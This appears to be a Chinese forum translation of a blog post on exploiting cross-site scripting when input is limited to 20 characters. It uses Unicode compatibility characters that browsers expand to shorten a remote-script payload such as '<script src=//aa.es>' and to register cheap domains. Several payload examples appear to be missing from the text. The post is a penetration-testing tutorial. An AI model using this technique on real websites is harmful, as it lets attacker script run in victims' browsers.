-
-
[翻译]Exploiting XSS with 20 characters limitation
-
发表于: 2019-12-19 13:55 6768
-
原文:https://jlajara.gitlab.io/posts/2019/11/30/XSS_20_characters.html
翻译:cherrir
校对:lipss
跨站点脚本攻击是web渗透测试中最常见的漏洞之一。但是由于注入点字符限制的问题,有时payload无法执行成功,在这篇文章中,将利用unicode兼容性来突破这一限制。
在unicode等价里一些字符的序列有相同的含义。
该特性被引入到标准中,以便与现有的标准字符集兼容,unicode有两种方法处理这种兼容性和规范等价性。
1、规范等价性:一些有着相同外形的字符序列也被认为有着相同的含义,如:n + ◌̃ = ñ。
2、兼容等价性:一些字符的外形可能不同,但是在某些情况下含义相同,如:ff字符等价于ff
因此,假设payload长度被限制,我们可以用如下这个不超过20个字符的payload:
这个payload只能简单弹个框,并不能展示xss的危害,例如加载外部JavaScript文件<script src=//aa.es>,让我们能更灵活地准备更复杂的XSS攻击。
这样的短payload可以实现输入20个字符加载远程JavaScript文件。但是弊端就是后面加载远程JavaScript文件的短域名早已经被注册或者购买价格太昂贵。
浏览器对某些unicode字符具有兼容性,例如payload:
注意:ff是一个字符,但是当浏览器解析时,ff被扩展为ff。这种特性可以用更便宜的方式购买更具有影响力的域名:
ff 扩展为 ff
℠ 扩展为 sm
㏛ 扩展为 sr
st 扩展为 st
㎭ 扩展为 rad
℡ 扩展为 tel
更多类似的unicode字符请参考:https://www.unicode.org/charts/normalization/
可以在这里查看unicode字符被浏览器解析后的样子:https://www.compart.com/en/unicode/U+2121
比如,我们注册域名telsr.pw这个例子只花1.28美元。
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!